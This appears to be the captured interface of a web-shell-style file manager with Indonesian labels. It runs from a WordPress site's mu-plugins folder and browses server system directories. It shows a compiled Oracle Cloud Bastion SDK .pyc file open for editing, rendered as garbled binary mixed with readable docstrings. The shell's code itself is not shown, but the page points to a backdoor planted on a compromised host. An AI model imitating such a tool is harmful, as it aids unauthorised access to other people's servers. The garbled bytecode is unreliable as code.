📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
bastion
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/bastion/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: create_session_details.pyc
a N��f� � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdd� Zedd� �Zejdd� �Zedd � �Z e jd d � �Z edd� �Z e jd d� �Z edd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Z e jdd� �Z dd� Zdd� Zdd� ZdS )�CreateSessionDetailsa� The configuration details for a new bastion session. A session lets authorized users connect to a target resource for a predetermined amount of time. The Bastion service recognizes two types of sessions, managed SSH sessions and SSH port forwarding sessions. Managed SSH sessions require that the target resource has an OpenSSH server and the Oracle Cloud Agent both running. �PUBc K sP ddddddd�| _ dddd d dd�| _d| _d| _d| _d| _d| _d| _dS ) a Initializes a new CreateSessionDetails object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param display_name: The value to assign to the display_name property of this CreateSessionDetails. :type display_name: str :param bastion_id: The value to assign to the bastion_id property of this CreateSessionDetails. :type bastion_id: str :param target_resource_details: The value to assign to the target_resource_details property of this CreateSessionDetails. :type target_resource_details: oci.bastion.models.CreateSessionTargetResourceDetails :param key_type: The value to assign to the key_type property of this CreateSessionDetails. Allowed values for this property are: "PUB" :type key_type: str :param key_details: The value to assign to the key_details property of this CreateSessionDetails. :type key_details: oci.bastion.models.PublicKeyDetails :param session_ttl_in_seconds: The value to assign to the session_ttl_in_seconds property of this CreateSessionDetails. :type session_ttl_in_seconds: int �str�"CreateSessionTargetResourceDetails�PublicKeyDetails�int)�display_name� bastion_id�target_resource_details�key_type�key_details�session_ttl_in_seconds�displayName� bastionId�targetResourceDetails�keyType� keyDetails�sessionTtlInSecondsN)� swagger_types� attribute_map� _display_name�_bastion_id�_target_resource_details� _key_type�_key_details�_session_ttl_in_seconds)�self�kwargs� r"